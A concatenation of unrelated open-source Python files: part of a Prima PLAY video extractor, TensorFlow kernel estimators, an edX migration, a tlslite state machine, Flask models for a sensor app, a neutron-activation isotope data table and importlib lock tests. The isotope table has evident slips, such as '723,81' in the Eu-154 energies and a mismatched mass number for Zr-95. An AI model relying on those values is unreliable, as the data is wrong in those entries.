'http://embed.livebox.cz/iprimaplay/player-embed-v2.js?__tok%s__=%s' %
(floor(random() * 1073741824), floor(random() * 1073741824))
)
req = compat_urllib_request.Request(player_url)
req.add_header('Referer', url)
playerpage = self._download_webpage(req, video_id)
base_url = ''.join(re.findall(r"embed\['stream'\] = '(.+?)'.+'(\?auth=)'.+'(.+?)';", playerpage)[1])
zoneGEO = self._html_search_regex(r'"zoneGEO":(.+?),', webpage, 'zoneGEO')
if zoneGEO != '0':
base_url = base_url.replace('token', 'token_' + zoneGEO)
formats = []
for format_id in ['lq', 'hq', 'hd']:
filename = self._html_search_regex(
r'"%s_id":(.+?),' % format_id, webpage, 'filename')
if filename == 'null':
continue
real_id = self._search_regex(
r'Prima-(?:[0-9]{10}|WEB)-([0-9]+)[-_]',
filename, 'real video id')
if format_id == 'lq':
quality = 0
elif format_id == 'hq':
quality = 1
elif format_id == 'hd':
quality = 2
filename = 'hq/' + filename
formats.append({
'format_id': format_id,
'url': base_url,
'quality': quality,
'play_path': 'mp4:' + filename.replace('"', '')[:-4],
'rtmp_live': True,
'ext': 'flv',
})
self._sort_formats(formats)
return {
'id': real_id,
'title': remove_end(self._og_search_title(webpage), ' | Prima PLAY'),
'thumbnail': self._og_search_thumbnail(webpage),
'formats': formats,
'description': self._search_regex(
r'<p[^>]+itemprop="description"[^>]*>([^<]+)',
webpage, 'description', default=None),
}
|
jpopelka/docker-py | refs/heads/master | docker/ssladapter/__init__.py | 87 | from .ssladapter import SSLAdapter # flake8: noqa
|
chemelnucfin/tensorflow | refs/heads/master | tensorflow/contrib/kernel_methods/python/kernel_estimators.py | 5 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Estimators that combine explicit kernel mappings with linear models."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import six
from tensorflow.contrib import layers
from tensorflow.contrib.kernel_methods.python.mappers import dense_kernel_mapper as dkm
from tensorflow.contrib.learn.python.learn.estimators import estimator
from tensorflow.contrib.learn.python.learn.estimators import head as head_lib
from tensorflow.contrib.learn.python.learn.estimators import linear
from tensorflow.contrib.learn.python.learn.estimators import prediction_key
from tensorflow.python.ops import array_ops
from tensorflow.python.platform import tf_logging as logging
_FEATURE_COLUMNS = "feature_columns"
_KERNEL_MAPPERS = "kernel_mappers"
_OPTIMIZER = "optimizer"
def _check_valid_kernel_mappers(kernel_mappers):
"""Checks that the input kernel_mappers are valid."""
if kernel_mappers is None:
return True
for kernel_mappers_list in six.itervalues(kernel_mappers):
for kernel_mapper in kernel_mappers_list:
if not isinstance(kernel_mapper, dkm.DenseKernelMapper):
return False
return True
def _check_valid_head(head):
"""Returns true if the provided head is supported."""
if head is None:
return False
# pylint: disable=protected-access
return isinstance(head, head_lib._BinaryLogisticHead) or isinstance(
head, head_lib._MultiClassHead)
# pylint: enable=protected-access
def _update_features_and_columns(features, feature_columns,
kernel_mappers_dict):
"""Updates features and feature_columns based on provided kernel mappers.
Currently supports the update of `RealValuedColumn`s only.
Args:
features: Initial features dict. The key is a `string` (feature column name)
and the value is a tensor.
feature_columns: Initial iterable containing all the feature columns to be
consumed (possibly after being updated) by the model. All items should be
instances of classes derived from `FeatureColumn`.
kernel_mappers_dict: A dict from feature column (type: _FeatureColumn) to
objects inheriting from KernelMapper class.
Returns:
updated features and feature_columns based on provided kernel_mappers_dict.
"""
if kernel_mappers_dict is None:
return features, feature_columns
# First construct new columns and features affected by kernel_mappers_dict.
mapped_features = {}
mapped_columns = set()
for feature_column in kernel_mappers_dict:
column_name = feature_column.name
# Currently only mappings over RealValuedColumns are supported.
if not isinstance(feature_column, layers.feature_column._RealValuedColumn): # pylint: disable=protected-access
logging.warning(
"Updates are currently supported on RealValuedColumns only. Metadata "
"for FeatureColumn {} will not be updated.".format(column_name))
continue
mapped_column_name = column_name + "_MAPPED"
# Construct new feature columns based on provided kernel_mappers.
column_kernel_mappers = kernel_mappers_dict[feature_column]
new_dim = sum(mapper.output_dim for mapper in column_kernel_mappers)
mapped_columns.add(
layers.feature_column.real_valued_column(mapped_column_name, new_dim))
# Get mapped features by concatenating mapped tensors (one mapped tensor
# per kernel mappers from the list of kernel mappers corresponding to each
# feature column).
output_tensors = []
for kernel_mapper in column_kernel_mappers:
output_tensors.append(kernel_mapper.map(features[column_name]))
tensor = array_ops.concat(output_tensors, 1)
mapped_features[mapped_column_name] = tensor
# Finally update features dict and feature_columns.
features = features.copy()
features.update(mapped_features)
feature_columns = set(feature_columns)
feature_columns.update(mapped_columns)
return features, feature_columns
def _kernel_model_fn(features, labels, mode, params, config=None):
"""model_fn for the Estimator using kernel methods.
Args:
features: `Tensor` or dict of `Tensor` (depends on data passed to `fit`).
labels: `Tensor` of shape [batch_size, 1] or [batch_size] labels of
dtype `int32` or `int64` in the range `[0, n_classes)`.
mode: Defines whether this is training, evaluation or prediction. See
`ModeKeys`.
params: A dict of hyperparameters.
The following hyperparameters are expected:
* head: A `Head` instance.
* feature_columns: An iterable containing all the feature columns used by
the model.
* optimizer: string, `Optimizer` object, or callable that defines the
optimizer to use for training. If `None`, will use a FTRL optimizer.
* kernel_mappers: Dictionary of kernel mappers to be applied to the input
features before training.
config: `RunConfig` object to configure the runtime settings.
Returns:
A `ModelFnOps` instance.
Raises:
ValueError: If mode is not any of the `ModeKeys`.
"""
feature_columns = params[_FEATURE_COLUMNS]
kernel_mappers = params[_KERNEL_MAPPERS]
updated_features, updated_columns = _update_features_and_columns(
features, feature_columns, kernel_mappers)
params[_FEATURE_COLUMNS] = updated_columns
return linear._linear_model_fn( # pylint: disable=protected-access
updated_features, labels, mode, params, config)
class _KernelEstimator(estimator.Estimator):
"""Generic kernel-based linear estimator."""
def __init__(self,
feature_columns=None,
model_dir=None,
weight_column_name=None,
head=None,
optimizer=None,
kernel_mappers=None,
config=None):
"""Constructs a `_KernelEstimator` object."""
if not feature_columns and not kernel_mappers:
raise ValueError(
"You should set at least one of feature_columns, kernel_mappers.")
if not _check_valid_kernel_mappers(kernel_mappers):
raise ValueError("Invalid kernel mappers.")
if not _check_valid_head(head):
raise ValueError(
"head type: {} is not supported. Supported head types: "
"_BinaryLogisticHead, _MultiClassHead.".format(type(head)))
params = {
"head": head,
_FEATURE_COLUMNS: feature_columns or [],
_OPTIMIZER: optimizer,
_KERNEL_MAPPERS: kernel_mappers,
}
super(_KernelEstimator, self).__init__(
model_fn=_kernel_model_fn,
model_dir=model_dir,
config=config,
params=params)
class KernelLinearClassifier(_KernelEstimator):
"""Linear classifier using kernel methods as feature preprocessing.
It trains a linear model after possibly mapping initial input features into
a mapped space using explicit kernel mappings. Due to the kernel mappings,
training a linear classifier in the mapped (output) space can detect
non-linearities in the input space.
The user can provide a list of kernel mappers to be applied to all or a subset
of existing feature_columns. This way, the user can effectively provide 2
types of feature columns:
* those passed as elements of feature_columns in the classifier's constructor
* those appearing as a key of the kernel_mappers dict.
If a column appears in feature_columns only, no mapping is applied to it. If
it appears as a key in kernel_mappers, the corresponding kernel mappers are
applied to it. Note that it is possible that a column appears in both places.
Currently kernel_mappers are supported for _RealValuedColumns only.
Example usage:
```
real_column_a = real_valued_column(name='real_column_a',...)
sparse_column_b = sparse_column_with_hash_bucket(...)
kernel_mappers = {real_column_a : [RandomFourierFeatureMapper(...)]}
optimizer = ...
# real_column_a is used as a feature in both its initial and its transformed
# (mapped) form. sparse_column_b is not affected by kernel mappers.
kernel_classifier = KernelLinearClassifier(
feature_columns=[real_column_a, sparse_column_b],
model_dir=...,
optimizer=optimizer,
kernel_mappers=kernel_mappers)
# real_column_a is used as a feature in its transformed (mapped) form only.
# sparse_column_b is not affected by kernel mappers.
kernel_classifier = KernelLinearClassifier(
feature_columns=[sparse_column_b],
model_dir=...,
optimizer=optimizer,
kernel_mappers=kernel_mappers)
# Input builders
def train_input_fn: # returns x, y
...
def eval_input_fn: # returns x, y
...
kernel_classifier.fit(input_fn=train_input_fn)
kernel_classifier.evaluate(input_fn=eval_input_fn)
kernel_classifier.predict(...)
```
Input of `fit` and `evaluate` should have following features, otherwise there
will be a `KeyError`:
* if `weight_column_name` is not `None`, a feature with
`key=weight_column_name` whose value is a `Tensor`.
* for each `column` in `feature_columns`:
- if `column` is a `SparseColumn`, a feature with `key=column.name`
whose `value` is a `SparseTensor`.
- if `column` is a `WeightedSparseColumn`, two features: the first with
`key` the id column name, the second with `key` the weight column name.
Both features' `value` must be a `SparseTensor`.
- if `column` is a `RealValuedColumn`, a feature with `key=column.name`
whose `value` is a `Tensor`.
"""
def __init__(self,
feature_columns=None,
model_dir=None,
n_classes=2,
weight_column_name=None,
optimizer=None,
kernel_mappers=None,
config=None):
"""Construct a `KernelLinearClassifier` estimator object.
Args:
feature_columns: An iterable containing all the feature columns used by
the model. All items in the set should be instances of classes derived
from `FeatureColumn`.
model_dir: Directory to save model parameters, graph etc. This can also be
used to load checkpoints from the directory into an estimator to
continue training a previously saved model.
n_classes: number of label classes. Default is binary classification.
Note that class labels are integers representing the class index (i.e.
values from 0 to n_classes-1). For arbitrary label values (e.g. string
labels), convert to class indices first.
weight_column_name: A string defining feature column name representing
weights. It is used to down weight or boost examples during training. It
will be multiplied by the loss of the example.
optimizer: The optimizer used to train the model. If specified, it should
be an instance of `tf.Optimizer`. If `None`, the Ftrl optimizer is used
by default.
kernel_mappers: Dictionary of kernel mappers to be applied to the input
features before training a (linear) model. Keys are feature columns and
values are lists of mappers to be applied to the corresponding feature
column. Currently only _RealValuedColumns are supported and therefore
all mappers should conform to the `DenseKernelMapper` interface (see
./mappers/dense_kernel_mapper.py).
config: `RunConfig` object to configure the runtime settings.
Returns:
A `KernelLinearClassifier` estimator.
Raises:
ValueError: if n_classes < 2.
ValueError: if neither feature_columns nor kernel_mappers are provided.
ValueError: if mappers provided as kernel_mappers values are invalid.
"""
super(KernelLinearClassifier, self).__init__(
feature_columns=feature_columns,
model_dir=model_dir,
weight_column_name=weight_column_name,
head=head_lib.multi_class_head(
n_classes=n_classes, weight_column_name=weight_column_name),
optimizer=optimizer,
kernel_mappers=kernel_mappers,
config=config)
def predict_classes(self, input_fn=None):
"""Runs inference to determine the predicted class per instance.
Args:
input_fn: The input function providing features.
Returns:
A generator of predicted classes for the features provided by input_fn.
Each predicted class is represented by its class index (i.e. integer from
0 to n_classes-1)
"""
key = prediction_key.PredictionKey.CLASSES
predictions = super(KernelLinearClassifier, self).predict(
input_fn=input_fn, outputs=[key])
return (pred[key] for pred in predictions)
def predict_proba(self, input_fn=None):
"""Runs inference to determine the class probability predictions.
Args:
input_fn: The input function providing features.
Returns:
A generator of predicted class probabilities for the features provided by
input_fn.
"""
key = prediction_key.PredictionKey.PROBABILITIES
predictions = super(KernelLinearClassifier, self).predict(
input_fn=input_fn, outputs=[key])
return (pred[key] for pred in predictions)
|
naresh21/synergetics-edx-platform | refs/heads/oxa/master.fic | openedx/core/djangoapps/micro_masters/migrations/0006_auto_20170712_1019.py | 2 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('micro_masters', '0005_programcertificatehtmlviewconfiguration_programcertificatesignatories_programgeneratedcertificate'),
]
operations = [
migrations.RemoveField(
model_name='programcertificatehtmlviewconfiguration',
name='changed_by',
),
migrations.DeleteModel(
name='ProgramCertificateHtmlViewConfiguration',
),
]
|
wheelcms/wheelcms_categories | refs/heads/master | setup.py | 1 | from setuptools import setup, find_packages
import os
version = '0.9'
setup(name='wheelcms_categories',
version=version,
description="WheelCMS category implementation",
long_description=open("README.txt").read(),
classifiers=[
"Programming Language :: Python",
],
keywords='',
author='Ivo van der Wijk',
author_email='wheelcms@in.m3r.nl',
url='http://github.com/wheelcms/wheelcms_categories',
license='BSD',
packages=find_packages(exclude=['ez_setup']),
namespace_packages=[],
include_package_data=True,
zip_safe=False,
install_requires=[
'setuptools',
'pytest',
],
entry_points={
},
)
|
Crystalnix/house-of-life-chromium | refs/heads/master | third_party/tlslite/tlslite/integration/AsyncStateMachine.py | 121 | """
A state machine for using TLS Lite with asynchronous I/O.
"""
class AsyncStateMachine:
"""
This is an abstract class that's used to integrate TLS Lite with
asyncore and Twisted.
This class signals wantsReadsEvent() and wantsWriteEvent(). When
the underlying socket has become readable or writeable, the event
should be passed to this class by calling inReadEvent() or
inWriteEvent(). This class will then try to read or write through
the socket, and will update its state appropriately.
This class will forward higher-level events to its subclass. For
example, when a complete TLS record has been received,
outReadEvent() will be called with the decrypted data.
"""
def __init__(self):
self._clear()
def _clear(self):
#These store the various asynchronous operations (i.e.
#generators). Only one of them, at most, is ever active at a
#time.
self.handshaker = None
self.closer = None
self.reader = None
self.writer = None
#This stores the result from the last call to the
#currently active operation. If 0 it indicates that the
#operation wants to read, if 1 it indicates that the
#operation wants to write. If None, there is no active
#operation.
self.result = None
def _checkAssert(self, maxActive=1):
#This checks that only one operation, at most, is
#active, and that self.result is set appropriately.
activeOps = 0
if self.handshaker:
activeOps += 1
if self.closer:
activeOps += 1
if self.reader:
activeOps += 1
if self.writer:
activeOps += 1
if self.result == None:
if activeOps != 0:
raise AssertionError()
elif self.result in (0,1):
if activeOps != 1:
raise AssertionError()
else:
raise AssertionError()
if activeOps > maxActive:
raise AssertionError()
def wantsReadEvent(self):
"""If the state machine wants to read.
If an operation is active, this returns whether or not the
operation wants to read from the socket. If an operation is
not active, this returns None.
@rtype: bool or None
@return: If the state machine wants to read.
"""
if self.result != None:
return self.result == 0
return None
def wantsWriteEvent(self):
"""If the state machine wants to write.
If an operation is active, this returns whether or not the
operation wants to write to the socket. If an operation is
not active, this returns None.
@rtype: bool or None
@return: If the state machine wants to write.
"""
if self.result != None:
return self.result == 1
return None
def outConnectEvent(self):
"""Called when a handshake operation completes.
May be overridden in subclass.
"""
pass
def outCloseEvent(self):
"""Called when a close operation completes.
May be overridden in subclass.
"""
pass
def outReadEvent(self, readBuffer):
"""Called when a read operation completes.
May be overridden in subclass."""
pass
def outWriteEvent(self):
"""Called when a write operation completes.
May be overridden in subclass."""
pass
def inReadEvent(self):
"""Tell the state machine it can read from the socket."""
try:
self._checkAssert()
if self.handshaker:
self._doHandshakeOp()
elif self.closer:
self._doCloseOp()
elif self.reader:
self._doReadOp()
elif self.writer:
self._doWriteOp()
else:
self.reader = self.tlsConnection.readAsync(16384)
self._doReadOp()
except:
self._clear()
raise
def inWriteEvent(self):
"""Tell the state machine it can write to the socket."""
try:
self._checkAssert()
if self.handshaker:
self._doHandshakeOp()
elif self.closer:
self._doCloseOp()
elif self.reader:
self._doReadOp()
elif self.writer:
self._doWriteOp()
else:
self.outWriteEvent()
except:
self._clear()
raise
def _doHandshakeOp(self):
try:
self.result = self.handshaker.next()
except StopIteration:
self.handshaker = None
self.result = None
self.outConnectEvent()
def _doCloseOp(self):
try:
self.result = self.closer.next()
except StopIteration:
self.closer = None
self.result = None
self.outCloseEvent()
def _doReadOp(self):
self.result = self.reader.next()
if not self.result in (0,1):
readBuffer = self.result
self.reader = None
self.result = None
self.outReadEvent(readBuffer)
def _doWriteOp(self):
try:
self.result = self.writer.next()
except StopIteration:
self.writer = None
self.result = None
def setHandshakeOp(self, handshaker):
"""Start a handshake operation.
@type handshaker: generator
@param handshaker: A generator created by using one of the
asynchronous handshake functions (i.e. handshakeServerAsync, or
handshakeClientxxx(..., async=True).
"""
try:
self._checkAssert(0)
self.handshaker = handshaker
self._doHandshakeOp()
except:
self._clear()
raise
def setServerHandshakeOp(self, **args):
"""Start a handshake operation.
The arguments passed to this function will be forwarded to
L{tlslite.TLSConnection.TLSConnection.handshakeServerAsync}.
"""
handshaker = self.tlsConnection.handshakeServerAsync(**args)
self.setHandshakeOp(handshaker)
def setCloseOp(self):
"""Start a close operation.
"""
try:
self._checkAssert(0)
self.closer = self.tlsConnection.closeAsync()
self._doCloseOp()
except:
self._clear()
raise
def setWriteOp(self, writeBuffer):
"""Start a write operation.
@type writeBuffer: str
@param writeBuffer: The string to transmit.
"""
try:
self._checkAssert(0)
self.writer = self.tlsConnection.writeAsync(writeBuffer)
self._doWriteOp()
except:
self._clear()
raise
|
jparker/therminator_server | refs/heads/master | therminator/models.py | 1 | from . import app, db, bcrypt
from flask_login import UserMixin
from functools import wraps
from sqlalchemy.orm import validates
import sqlalchemy.dialects.postgresql as psql
def validates_presence(f):
@wraps(f)
def validator(self, key, value):
if value is None:
raise ValueError("{} can't be blank".format(key))
return f(self, key, value)
return validator
class User(db.Model, UserMixin):
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
name = db.Column(db.String(255), nullable=False)
email = db.Column(db.String(255), nullable=False, unique=True)
password = db.Column(db.String(255), nullable=False)
api_key = db.Column(
db.String(255),
nullable=False,
server_default=db.func.encode(db.func.gen_random_bytes(32), 'hex'),
unique=True
)
homes = db.relationship(
'Home',
backref='user',
lazy='dynamic',
order_by='Home.name'
)
def __init__(self, name, email, password):
self.name = name
self.email = email
self.password = password
def __repr__(self):
return '<User id={} email={}>'.format(self.id, self.email)
def is_correct_password(self, plaintext):
return bcrypt.check_password_hash(self.password, plaintext)
@validates('password')
def validates_password(self, key, value):
return bcrypt.generate_password_hash(
value,
app.config['BCRYPT_LOG_ROUNDS'],
).decode()
class Home(db.Model):
__tablename__ = 'homes'
__table_args__ = (
db.UniqueConstraint('user_id', 'name', name='user_id_name_unq'),
)
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
user_id = db.Column(db.Integer, db.ForeignKey('users.id'), nullable=False)
name = db.Column(db.String(255), nullable=False)
timezone = db.Column(db.String(255), nullable=False, server_default='UTC')
sensors = db.relationship(
'Sensor',
backref='home',
lazy='dynamic',
order_by='Sensor.name',
)
def __init__(self, user, name, timezone):
self.user = user
self.name = name
self.timezone = timezone
def __repr__(self):
return '<Home id={} name={} timezone={}>' \
.format(self.id, self.name, self.timezone)
class Sensor(db.Model):
__tablename__ = 'sensors'
__table_args__ = (
db.UniqueConstraint('home_id', 'name', name='home_id_name_unq'),
)
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
home_id = db.Column(db.Integer, db.ForeignKey('homes.id'), nullable=False)
name = db.Column(db.String(255), nullable=False)
uuid = db.Column(
psql.UUID,
nullable=False,
server_default=db.func.gen_random_uuid(),
unique=True,
)
readings = db.relationship(
'Reading',
backref='sensor',
lazy='dynamic',
order_by='Reading.timestamp',
)
_latest_reading = None
def __init__(self, home, name):
self.home = home
self.name = name
def __repr__(self):
return '<Sensor id={} name={}>'.format(self.id, self.name)
def latest_reading(self):
if not self._latest_reading:
unordered = self.readings.order_by(None)
self._latest_reading = unordered.order_by(Reading.timestamp.desc()).first()
return self._latest_reading
class Reading(db.Model):
__tablename__ = 'readings'
__table_args__ = (
db.UniqueConstraint(
'sensor_id', 'timestamp',
name='sensor_id_timestamp_unq'
),
db.CheckConstraint(
'humidity >= 0 AND humidity <= 100',
name='humidity_between_0_and_100',
),
db.CheckConstraint(
'resistance >= 0',
name='resistance_must_be_positive',
),
)
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
sensor_id = db.Column(db.Integer, db.ForeignKey('sensors.id'), nullable=False)
timestamp = db.Column(db.DateTime, index=True, nullable=False)
int_temp = db.Column(db.Float, nullable=False, server_default='0.0')
ext_temp = db.Column(db.Float, nullable=False, index=True)
humidity = db.Column(db.Float, nullable=False, server_default='0.0')
resistance = db.Column(db.Float, nullable=False, server_default='0.0')
def __init__(
self,
sensor,
timestamp=None,
int_temp=None,
ext_temp=None,
humidity=None,
resistance=None,
):
self.sensor = sensor
self.timestamp = timestamp
self.int_temp = int_temp
self.ext_temp = ext_temp
self.humidity = humidity
self.resistance = resistance
def __repr__(self):
return '<Reading timestamp={} ext_temp={} humidity={} resistance={}>' \
.format(
self.timestamp,
self.ext_temp,
self.humidity,
self.resistance,
)
def as_dict(self):
return dict(
timestamp=self.timestamp.strftime('%Y-%m-%dT%H:%MZ'),
int_temp=self.int_temp,
ext_temp=self.ext_temp,
humidity=self.humidity,
resistance=self.resistance,
)
def int_temp_f(self):
return self.int_temp * 9/5 + 32
def ext_temp_f(self):
return self.ext_temp * 9/5 + 32
def luminosity(self):
if self.resistance > 0:
return 10**6 / self.resistance
else:
return None
@validates('timestamp')
@validates_presence
def validate_timestamp(self, key, value):
return value
@validates('ext_temp')
@validates_presence
def validate_ext_temp(self, key, value):
return value
@validates('humidity')
@validates_presence
def validate_humidity(self, key, value):
try:
value = float(value)
if value < 0 or value > 100:
raise ValueError('humidity must be between 0 and 100')
except TypeError as e:
raise ValueError('humidity must be a number') from e
return value
@validates('resistance')
@validates_presence
def validate_resistance(self, key, value):
if value < 0:
return 0.0
return value
|
bearing/radwatch-analysis | refs/heads/master | NAA_Isotopes.py | 1 | import numpy as np
class NAA_source(object):
sources = []
def __init__(self, Symbol, A, lam, energies):
self.Symbol = Symbol
self.A = A
self.lam = lam
self.energies = energies
NAA_source.sources.append(self)
def __repr__(self):
return '{0}_{1}'.format(self.Symbol, self.A + 1)
Na_24_energies = {'energy': [1368.626, 2754.007],
'branching_ratio':[1, 0.99855]}
Na_24 = NAA_source('Na', 23, 1.284e-5, Na_24_energies)
K_40_energies = {'energy': [1460.82], 'branching_ratio':[0.1066]}
K_40 = NAA_source ('K', 39, 1.761e-17, K_40_energies)
K_42_energies = {'energy': [1524.7],
'branching_ratio': [0.18]}
K_42 = NAA_source('K', 41, 1.56e-5, K_42_energies)
Sc_46_energies = {'energy': [889.277, 1120.545],
'branching_ratio': [0.99984, 0.99987]}
Sc_46 = NAA_source('Sc', 45, 2.4e-6, Sc_46_energies)
Ca_47_energies = {'energy':[489.23, 807.86, 1297.09],
'branching_ratio':[0.062, 0.062, 0.71]}
Ca_47 = NAA_source('Ca', 46, 1.769e-6, Ca_47_energies)
Cr_51_energies = {'energy': [320.1],
'branching_ratio': [0.1]}
Cr_51 = NAA_source('Cr', 50, 2.9e-7, Cr_51_energies)
Mn_56_energies = {'energy':[846.771, 1810.772, 2113.123],
'branching_ratio':[0.989, 0.272, 0.143]}
Mn_56 = NAA_source('Mn', 55, 7.467e-5, Mn_56_energies)
Fe_59_energies = {'energy': [1099.43, 1291.79],
'branching_ratio': [0.565, 0.432]}
Fe_59 = NAA_source('Fe', 58, 1.8e-7, Fe_59_energies)
Co_60_energies = {'energy': [1173.43, 1332.71],
'branching_ratio': [0.999735, 0.999856]}
Co_60 = NAA_source('Co', 59, 4.17e-9, Co_60_energies)
Cu_64_energies = {'energy': [1345.84], 'branching_ratio': [0.00473]}
Cu_64 = NAA_source('Cu', 63, 1.516e-5, Cu_64_energies)
Zn_65_energies = {'energy': [1115.86],
'branching_ratio': [0.506]}
Zn_65 = NAA_source('Zn', 64, 3.28e-8, Zn_65_energies)
Ga_72_energies = {'energy': [834.01, 629.95, 600.94],
'branching_ratio': [0.96, 0.248, 0.0554]}
Ga_72 = NAA_source('Ga', 71, 1.366e-5, Ga_72_energies)
Se_75_energies = {'energy': [121.1155, 136, 264.6576, 279.54, 400.6576],
'branching_ratio': [0.172, 0.583, 0.589, 0.2499, 0.1147]}
Se_75 = NAA_source('Se', 74, 6.698e-8, Se_75_energies)
As_76_energies = {'energy': [559.24, 657.25],
'branching_ratio': [0.45, 0.052]}
As_76 = NAA_source('As', 75, 7.44e-6, As_76_energies)
Kr_81_energies = {'energy': [275.988], 'branching_ratio': [0.3]}
Kr_81 = NAA_source('Kr', 80, 9.59806e-14, Kr_81_energies)
Br_82_energies = {'energy': [559.49, 619.67, 776.45],
'branching_ratio': [0.45, 0.434, 0.835]}
Br_82 = NAA_source('Br', 81, 5.45e-6, Br_82_energies)
Sr_85_energies = {'energy': [514.0067], 'branching_ratio': [0.96]}
Sr_85 = NAA_source('Sr', 84, 1.2373e-7, Sr_85_energies)
Rb_86_energies = {'energy': [1076.96],
'branching_ratio': [0.09]}
Rb_86 = NAA_source('Rb', 85, 4.31e-7, Rb_86_energies)
Zr_95_energies = {'energy': [724.2, 759.73], 'branching_ratio': [0.4417, 0.54]}
Zr_95 = NAA_source('Zr', 95, 1.253e-7, Zr_95_energies)
Zr_97_energies = {'energy': [743.36], 'branching_ratio': [.93]}
Zr_97 = NAA_source('Zr', 96, 1.139e-5, Zr_97_energies)
Sb_122_energies = {'energy': [564.12, 692.794],
'branching_ratio': [0.71, 0.0385]}
Sb_122 = NAA_source('Sb', 121, 2.945e-6, Sb_122_energies)
Sb_124_energies = {'energy': [602.72, 1690.98],
'branching_ratio': [0.9826, 0.4779]}
Sb_124 = NAA_source('Sb', 123, 1.33e-7, Sb_124_energies)
Ba_131_energies = {'energy': [123.81, 216.078, 496.47],
'branching_ratio': [0.2897, 0.1966, 0.47]}
Ba_131 = NAA_source('Ba', 130, 6.98e-7, Ba_131_energies)
Cs_134_energies = {'energy': [569.48, 604.721, 796.02],
'branching_ratio': [0.1538, 0.9762, 0.8553]}
Cs_134 = NAA_source('Cs', 133, 1.06e-8, Cs_134_energies)
Cs_137_energies= {'energy':[661.657], 'branching_ratio': [0.851]}
Cs_137 = NAA_source('Cs', 136, 7.307e-10, Cs_137_energies)
Cs_138_energies = {'energy': [1435.795], 'branching_ratio': [.763]}
Cs_138 = NAA_source('Cs', 137, .000347, Cs_138_energies)
La_140_energies = {'energy': [328.86, 487.16, 751.81, 815.96, 925.4, 1596.43,
2521.64],
'branching_ratio': [0.203, 0.455, 0.0433, 0.2328, 0.069,
0.954, 0.0346]}
La_140 = NAA_source('La', 139, 5.45e-6, La_140_energies)
Ce_141_energies = {'energy': [145.44],
'branching_ratio': [0.482]}
Ce_141 = NAA_source('Ce', 140, 2.48e-7, Ce_141_energies)
Eu_152_energies = {'energy': [121.78, 244.7, 344.35, 778.9, 964.1, 1085.9,
1112.1, 1408],
'branching_ratio': [0.2858, 0.0758, 0.265, 0.12942,
0.14605, 0.10207, 0.13644, 0.21005]}
Eu_152 = NAA_source('Eu', 151, 1.62e-9, Eu_152_energies)
Eu_154_energies = {'energy': [723,81, 1274.65],
'branching_ratio': [0.2022, 0.3519]}
Eu_154 = NAA_source('Eu', 153, 2.45e-9, Eu_154_energies)
Dy_165_energies = {'energy': [361.68], 'branching_ratio': [0.0084]}
Dy_165 = NAA_source('Dy', 164, 8.248e-5, Dy_165_energies)
Hf_181_energies = {'energy': [482.182, 133.024, 345.916],
'branching_ratio': [.805, .433, .1512]}
Hf_181 = NAA_source('Hf', 180, 1.893e-7, Hf_181_energies)
Au_198_energies = {'energy': [411.803], 'branching_ratio': [0.96]}
Au_198 = NAA_source('Au', 197, 2.9766e-6, Au_198_energies)
Hg_203_energies = {'energy': [279.197], 'branching_ratio': [0.81]}
Hg_203 = NAA_source('Hg', 202, 1.721e-7, Hg_203_energies)
|
tshlabs/tunic | refs/heads/master | test/unit/test_api.py | 1 | # -*- coding: utf-8 -*-
import tunic.api
def test_public_exports():
exports = set([item for item in dir(tunic.api) if not item.startswith('_')])
declared = set(tunic.api.__all__)
assert exports == declared, 'Exports and __all__ members should match'
|
Zhongqilong/kbengine | refs/heads/master | kbe/src/lib/python/Lib/test/test_importlib/test_locks.py | 84 | from . import util
frozen_init, source_init = util.import_importlib('importlib')
frozen_bootstrap = frozen_init._bootstrap
source_bootstrap = source_init._bootstrap
import sys
import time
import unittest
import weakref
from test import support
try:
import threading
except ImportError:
threading = None
else:
from test import lock_tests
if threading is not None:
class ModuleLockAsRLockTests:
locktype = classmethod(lambda cls: cls.LockType("some_lock"))
# _is_owned() unsupported
test__is_owned = None
# acquire(blocking=False) unsupported
test_try_acquire = None
test_try_acquire_contended = None
# `with` unsupported
test_with = None
# acquire(timeout=...) unsupported
test_timeout = None
# _release_save() unsupported
test_release_save_unacquired = None
class Frozen_ModuleLockAsRLockTests(ModuleLockAsRLockTests, lock_tests.RLockTests):
LockType = frozen_bootstrap._ModuleLock
class Source_ModuleLockAsRLockTests(ModuleLockAsRLockTests, lock_tests.RLockTests):
LockType = source_bootstrap._ModuleLock
else:
class Frozen_ModuleLockAsRLockTests(unittest.TestCase):
pass
class Source_ModuleLockAsRLockTests(unittest.TestCase):
pass
class DeadlockAvoidanceTests:
def setUp(self):
try:
self.old_switchinterval = sys.getswitchinterval()
sys.setswitchinterval(0.000001)
except AttributeError:
self.old_switchinterval = None
def tearDown(self):
if self.old_switchinterval is not None:
sys.setswitchinterval(self.old_switchinterval)
def run_deadlock_avoidance_test(self, create_deadlock):
NLOCKS = 10
locks = [self.LockType(str(i)) for i in range(NLOCKS)]
pairs = [(locks[i], locks[(i+1)%NLOCKS]) for i in range(NLOCKS)]
if create_deadlock:
NTHREADS = NLOCKS
else:
NTHREADS = NLOCKS - 1
barrier = threading.Barrier(NTHREADS)
results = []
def _acquire(lock):
"""Try to acquire the lock. Return True on success, False on deadlock."""
try:
lock.acquire()
except self.DeadlockError:
return False
else:
return True
def f():
a, b = pairs.pop()
ra = _acquire(a)
barrier.wait()
rb = _acquire(b)
results.append((ra, rb))
if rb:
b.release()
if ra:
a.release()
lock_tests.Bunch(f, NTHREADS).wait_for_finished()
self.assertEqual(len(results), NTHREADS)
return results
def test_deadlock(self):
results = self.run_deadlock_avoidance_test(True)
# At least one of the threads detected a potential deadlock on its
# second acquire() call. It may be several of them, because the
# deadlock avoidance mechanism is conservative.
nb_deadlocks = results.count((True, False))
self.assertGreaterEqual(nb_deadlocks, 1)
self.assertEqual(results.count((True, True)), len(results) - nb_deadlocks)
